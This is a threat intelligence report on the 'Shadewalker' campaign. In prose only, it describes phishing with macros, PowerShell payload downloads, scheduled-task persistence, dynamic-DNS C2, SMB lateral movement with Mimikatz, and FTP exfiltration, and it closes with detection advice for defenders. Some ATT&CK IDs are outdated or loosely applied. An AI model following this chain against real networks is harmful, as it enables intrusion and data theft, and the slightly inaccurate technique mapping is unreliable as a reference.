Alex Morgan — Threat Intelligence Analyst
Key Takeaways
- The ‘Shadewalker’ malware utilizes social engineering techniques for initial access and masquerades as legitimate software.
- Our investigation revealed extensive use of PowerShell for execution, leveraging T1064 – Scripting to maintain persistence.
- Command and Control (C2) infrastructure was dynamic, utilizing both HTTPS and non-standard ports to obfuscate traffic.
Executive Summary
During our analysis of the ‘Shadewalker’ malware strain, we uncovered a sophisticated attack chain characterized by its stealthy behavior and evasive tactics. The campaign appears to target organizations in various sectors, with a focus on data exfiltration and cyber espionage. Our investigation into the unique TTPs employed by the actor revealed a clear intent to maintain a prolonged presence within victim networks while minimizing detection.
Initial Access
Initial access was primarily achieved through phishing emails containing malicious attachments disguised as documents. The sample we examined utilized a decoy document that, when opened, prompted the user to enable macros. This action triggered a T1059.001 – PowerShell script which fetched the payload from a remote server. The employment of social engineering tactics highlights the actor’s reliance on human interaction to breach defenses effectively.
Execution & Persistence
Post-initial access, we observed the malware’s execution phase heavily relying on PowerShell scripts. Upon being downloaded, the implant executed additional commands to further download and execute a secondary payload, ensuring the actor could maintain control. Our analysis revealed that T1053.005 – Scheduled Task/Job was leveraged as a persistence mechanism, creating a task entry under C:\Windows\System32\Tasks\Shadewalker. This ensured the malware would survive reboots and could re-establish its connection to the C2 server periodically.
Command and Control
The actor established robust C2 communications to control compromised assets. We identified several base64-encoded HTTPS requests to untrusted domains that served as intermediaries for sending commands and receiving data. The use of dynamic DNS further concealed the C2’s footprint, complicating detection efforts. The malware exhibited beacons every 10 minutes, adhering to a systematic polling interval that is typical for T1071.001 – Application Layer Protocol: Web Protocols and ensuring consistent communication.
Lateral Movement & Discovery
Upon gaining access to the initial host, the malware’s capabilities extended to lateral movement. Utilizing T1021.002 – SMB/Windows Admin Shares, the operator executed commands to enumerate shares on the local network. Tools like Mimikatz were observed being downloaded for credential harvesting, facilitating further lateral movement. Specifically, we detected activity targeting Kerberos tickets to impersonate users across domains, allowing escalated privileges on additional network resources.
Impact & Objectives
The primary objectives behind the Shadewalker campaign were data exfiltration and reconnaissance, targeting sensitive data stored on endpoints and shared drives. During our analysis, we found logs indicating the transfer of substantial volumes of data to external FTP servers. The data seems to consist of both intellectual property and sensitive employee information, underscoring the campaign’s potential ramifications on both operational security and regulatory compliance.
MITRE ATT&CK Mapping
- T1071.001 – Application Layer Protocol: Web Protocols: Utilizing web protocols to establish command and control communications.
- T1064 – Scripting: Utilizing scripting languages for execution of malicious payloads.
- T1053.005 – Scheduled Task/Job: Creating tasks to maintain persistence across system reboots.
- T1021.002 – SMB/Windows Admin Shares: Leveraging SMB for lateral movement within the network.
Detection Opportunities
- Monitor for unusual PowerShell activity using T1059.001 – PowerShell and flag any script execution that does not conform to organizational norms.
- Implement network monitoring for C2 traffic patterns associated with dynamic DNS and non-standard ports.
- Regularly audit credential usage and lateral movement patterns to detect anomalies indicative of T1086 – PowerShell or Mimikatz activity.
Analyst Notes
The Shadewalker campaign represents a complex and multi-faceted threat that leverages social engineering, advanced scripting, and stealthy lateral movement techniques. Organizations should prioritize user training on phishing awareness and establish robust logging and monitoring protocols to mitigate the risks associated with such sophisticated threats. Continuous vigilance and proactive threat hunting are essential to defend against evolving tactics employed by actors behind campaigns like these.
Source: Original Report